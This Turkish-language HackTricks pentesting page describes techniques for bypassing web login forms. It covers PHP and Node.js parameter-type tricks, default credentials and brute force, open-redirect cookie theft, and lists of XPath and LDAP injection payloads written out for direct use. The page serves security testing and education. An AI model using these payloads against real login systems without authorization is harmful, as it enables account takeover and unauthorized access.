Giriş Atlatma
Reading time: 4 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking'i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Normal girişi atlatma
Bir giriş sayfası bulursanız, bunu atlatmak için deneyebileceğiniz bazı teknikler burada:
- Sayfa içindeki yorumları kontrol edin (aşağı ve sağa kaydırın?)
- Kısıtlı sayfalara doğrudan erişip erişemeyeceğinizi kontrol edin
- Parametreleri göndermemeyi kontrol edin (hiç göndermeyin veya sadece 1 tane gönderin)
- PHP karşılaştırma hatasını kontrol edin:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- İçerik türünü json olarak değiştirin ve json değerleri gönderin (bool true dahil)
- POST'un desteklenmediğini belirten bir yanıt alırsanız, JSON'u gövdeye GET isteği ile
Content-Type: application/json
ile göndermeyi deneyebilirsiniz - Nodejs potansiyel ayrıştırma hatasını kontrol edin (okuyun bunu):
password[password]=1
- Nodejs, bu yükü aşağıdaki gibi bir sorguya dönüştürecektir:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
bu, şifre bitinin her zaman doğru olmasını sağlar. - Bir JSON nesnesi gönderebiliyorsanız, girişi atlatmak için
"password":{"password": 1}
gönderebilirsiniz. - Bu girişi atlatmak için hala geçerli bir kullanıcı adı bilmeniz ve göndermeniz gerektiğini unutmayın.
mysql.createConnection
çağrısında"stringifyObjects":true
seçeneğini eklemek, parametre olarakObject
geçirildiğinde tüm beklenmedik davranışları engelleyecektir.- Kimlik bilgilerini kontrol edin:
- Kullanılan teknoloji/platformun varsayılan kimlik bilgileri
- Yaygın kombinasyonlar (root, admin, password, teknolojinin adı, bu şifrelerden biriyle varsayılan kullanıcı).
- Cewl kullanarak bir sözlük oluşturun, varsayılan kullanıcı adı ve şifreyi (varsa) ekleyin ve tüm kelimeleri kullanıcı adı ve şifre olarak kullanarak brute-force deneyin.
- Daha büyük bir sözlük kullanarak brute-force yapın (Brute force)
SQL Enjeksiyonu ile kimlik doğrulama atlatma
Burada SQL enjeksiyonları aracılığıyla girişi atlatmak için birkaç hile bulabilirsiniz.
Aşağıdaki sayfada SQL Enjeksiyonları aracılığıyla girişi atlatmak için bir özel liste bulabilirsiniz:
NoSQL Enjeksiyonu ile kimlik doğrulama atlatma
Burada NoSQL Enjeksiyonları aracılığıyla girişi atlatmak için birkaç hile bulabilirsiniz.
NoSQL Enjeksiyonları, parametre değerlerini değiştirmeyi gerektirdiğinden, bunları manuel olarak test etmeniz gerekecektir.
XPath Enjeksiyonu ile kimlik doğrulama atlatma
Burada XPath Enjeksiyonu aracılığıyla girişi atlatmak için birkaç hile bulabilirsiniz.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection kimlik doğrulama atlatma
Burada LDAP Injection ile giriş atlatmak için birkaç hile bulabilirsiniz.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Beni Hatırla
Eğer sayfada "Beni Hatırla" işlevi varsa, nasıl uygulandığını kontrol edin ve bunu diğer hesapları ele geçirmek için kötüye kullanıp kullanamayacağınıza bakın.
Yönlendirmeler
Sayfalar genellikle giriş yaptıktan sonra kullanıcıları yönlendirir, bu yönlendirmeyi değiştirebilir misiniz Açık Yönlendirme oluşturmak için kontrol edin. Kullanıcıyı kendi web sitenize yönlendirirseniz bazı bilgileri (kodlar, çerezler...) çalabilirsiniz.
Diğer Kontroller
- Giriş işlevini kötüye kullanarak kullanıcı adlarını numaralandırabilir misiniz kontrol edin.
- Şifre/hassas bilgi formları girişi için otomatik tamamlama aktif mi kontrol edin:
<input autocomplete="false">
Otomatik Araçlar
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking'i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.